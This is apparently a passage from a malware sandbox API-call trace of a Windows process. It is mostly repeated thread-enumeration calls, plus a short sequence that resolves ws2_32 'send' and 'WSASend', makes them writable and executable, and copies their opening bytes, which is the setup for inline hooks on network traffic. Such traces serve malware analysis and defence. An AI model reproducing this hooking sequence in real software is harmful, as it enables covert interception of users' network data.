Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.890] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.890] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.891] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.891] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.891] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.892] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.892] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.892] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.892] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.893] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.893] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.893] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.894] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.894] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.894] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.894] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.895] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.895] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.895] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.896] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.896] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.896] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.896] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.897] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.897] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.897] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.898] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.898] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.898] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.898] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.899] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.899] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.899] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.900] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.900] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.900] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.900] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.901] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.901] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.901] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.902] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.902] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.902] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.902] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.903] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.903] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.903] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.904] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.904] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.904] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.904] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.905] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.905] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.905] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.905] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.906] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.906] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.906] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.907] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.907] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.907] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.907] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.908] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.908] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.908] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.909] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.909] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.909] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0168.909] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.011] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.011] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.011] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.012] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.012] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.012] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.012] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.013] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.013] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.013] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.014] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.014] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.014] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.014] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.015] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.015] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.015] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.016] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.016] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.016] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.017] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.017] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.017] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.017] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.018] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.018] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.018] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.019] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.019] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.019] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.020] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.020] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.020] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.021] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.021] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.021] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.021] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.022] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.022] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.022] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.023] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.023] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.023] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.023] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.024] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.024] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.024] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.025] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.025] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.025] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.025] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.026] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.026] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.026] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.027] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.027] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.027] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.028] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.028] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.028] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.028] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.029] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.029] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.029] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.030] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.030] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.030] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.030] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.031] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.031] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.031] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.032] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.032] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.032] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.032] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.033] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.033] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.033] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.034] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.034] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.034] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.035] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.035] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.035] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.035] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.036] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.036] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.036] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.037] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.037] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.037] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.038] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.038] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.038] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.038] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.039] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.039] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.039] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.040] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.040] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.040] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.041] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.041] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.041] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.041] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.042] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.234] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x7fefe260000 [0169.234] GetProcAddress (hModule=0x7fefe260000, lpProcName="send") returned 0x7fefe268000 [0169.234] VirtualProtect (in: lpAddress=0x7fefe268000, dwSize=0xf, flNewProtect=0x40, lpflOldProtect=0x295224 | out: lpflOldProtect=0x295224*=0x20) returned 1 [0169.234] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x2a0000 [0169.235] RtlMoveMemory (in: Destination=0x2a0000, Source=0x7fefe268000, Length=0xf | out: Destination=0x2a0000) [0169.235] VirtualProtect (in: lpAddress=0x7fefe268000, dwSize=0xf, flNewProtect=0x20, lpflOldProtect=0x295224 | out: lpflOldProtect=0x295224*=0x40) returned 1 [0169.334] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x7fefe260000 [0169.334] GetProcAddress (hModule=0x7fefe260000, lpProcName="WSASend") returned 0x7fefe2613b0 [0169.334] VirtualProtect (in: lpAddress=0x7fefe2613b0, dwSize=0xf, flNewProtect=0x40, lpflOldProtect=0x295224 | out: lpflOldProtect=0x295224*=0x20) returned 1 [0169.334] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x1fb0000 [0169.334] RtlMoveMemory (in: Destination=0x1fb0000, Source=0x7fefe2613b0, Length=0xf | out: Destination=0x1fb0000) [0169.335] VirtualProtect (in: lpAddress=0x7fefe2613b0, dwSize=0xf, flNewProtect=0x20, lpflOldProtect=0x295224 | out: lpflOldProtect=0x295224*=0x40) returned 1 [0169.341] GetCurrentProcessId () returned 0x790 [0169.341] GetCurrentThreadId () returned 0xa18 [0169.341] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x140 [0169.343] Thread32First (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.344] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.344] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.344] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.344] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.345] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.345] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.345] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.346] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.346] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.346] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.347] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.347] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.347] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.348] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.348] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.348] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.348] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.349] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.349] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.349] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.350] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.350] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.350] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.350] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.351] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.351] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.351] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.352] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.352] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.352] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.353] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.353] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.353] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.353] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.354] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.354] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.354] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.355] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.355] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.355] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.355] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.356] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.356] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.356] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.357] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.357] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.357] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.357] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.358] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.358] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.358] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.359] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.359] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.359] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.359] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.360] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.360] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.360] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.361] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.361] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.361] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.361] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.362] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.424] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.424] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.424] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.424] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.425] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.425] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.425] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.426] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.426] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.426] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.426] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.427] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.427] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.427] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.428] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.428] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.428] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.429] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.429] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.429] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.429] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.430] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.430] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.430] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.431] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.431] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.431] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.431] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.432] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.432] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.432] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.433] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.433] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.433] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.433] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.434] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.434] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.434] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.435] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.435] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.435] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.435] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.436] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.436] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.436] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.437] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.437] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.437] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.437] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.438] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.438] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.438] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.439] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.439] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.439] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.439] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.440] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.440] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.441] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.441] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.441] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.441] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.442] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.442] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.442] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.443] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.443] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.443] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.443] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.444] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.444] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.444] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.445] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.445] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.445] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.446] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.446] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.446] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.446] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.447] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.447] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.447] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.448] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.448] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.448] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.448] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.449] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.449] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.449] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.450] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.450] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.450] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.450] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.451] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.451] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.451] Thread32Next 